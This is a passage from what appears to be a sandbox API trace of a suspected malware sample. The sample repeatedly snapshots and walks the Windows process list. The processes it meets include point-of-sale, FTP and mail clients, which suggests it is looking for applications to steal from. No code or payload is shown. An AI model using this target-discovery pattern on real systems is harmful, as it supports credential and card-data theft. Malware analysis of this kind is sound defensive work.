1 [0199.477] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0199.481] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0199.483] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0199.486] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0199.489] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0199.492] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0199.495] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0199.498] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0199.501] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0199.507] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0199.510] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.513] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0199.516] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.520] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0199.522] Process32Next (in: hSnapshot=0x19d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0199.527] CloseHandle (hObject=0x19d4) returned 1 [0199.527] Sleep (dwMilliseconds=0x64) [0199.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208c [0199.659] Process32First (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.661] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.664] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.665] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.667] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.670] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.672] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.674] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.676] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.678] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.680] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.713] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.715] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.717] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.719] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.721] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.723] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.725] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.726] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.728] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0199.731] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0199.733] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.734] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0199.736] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.738] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0199.740] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0199.742] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0199.744] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0199.746] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0199.788] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0199.791] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.794] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.797] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.799] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.802] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.804] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.807] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0199.811] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0199.813] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0199.814] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0199.816] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0199.818] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0199.819] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0199.821] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0199.951] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0199.953] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0199.955] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0199.957] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0199.959] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0199.961] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0199.963] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0199.964] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0199.966] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0199.968] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0199.971] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0199.973] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0199.975] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0199.976] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0199.979] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0199.981] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0199.983] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0199.986] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0200.025] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0200.027] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0200.029] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0200.031] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0200.033] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0200.035] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0200.049] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0200.051] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 